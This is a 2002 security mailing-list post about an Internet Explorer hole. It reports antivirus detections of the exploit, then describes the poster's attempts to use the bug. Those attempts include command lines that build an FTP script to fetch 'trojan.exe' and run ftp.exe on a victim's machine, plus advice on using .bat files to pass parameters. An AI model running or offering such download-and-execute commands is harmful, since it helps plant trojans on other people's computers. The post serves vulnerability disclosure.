Re: [Re: Rather large MSIE-hole] another variant

[Felipe Franciosi <franciozzy () terra com br>]

> FYI - Norton AV now picks this up.
>
>
> Scan type:  Realtime Protection Scan
> Event:  Virus Found!
> Virus name: XMLid.Exploit
> File:  C:\XXXXX\Local Settings\Temporary Internet
> Files\Content.IE5\C9IVKTMJ\simplebind[1].htm
> Location:  Quarantine
> Computer:  XXXXXX
> User:  XXXXXX
> Action taken:  Clean failed : Quarantine succeeded : Access denied
> Date found: Fri Mar 15 19:46:32 2002
>
> madness.

My PC CILLIN 2000 also detected the malformed "jpg" files in my
temporary folder...

Just as your norton, it placed the files under quarentine.  The
bad news is that the "malicius web code" scanner is not looking
for this  "jpg"  files  in real time (when you are browsing the
web).

Regards,
Felipe

.........

While trying to execute something like:
"c:/command.com /c echo bin > test",
"c:/command.com /c echo GET trojan.exe >> test",
"c:/windows/ftp.exe ...."

I came up with something interesting:

This bug will NOT execute '.com' files. Maybe it's worth trying
to execute '.bat'  files before attempting to place batch files
on the victim's computer in order to pass parameters.

I  found  this  out  by  discovering  that  it will not execute
"c:/command.com",  so if I'm wrong on my statement, please for-
give me...  I'm  very  tired  and I'm going to bed now. No more
tests for today.

my $.02...

Regards,
Felipe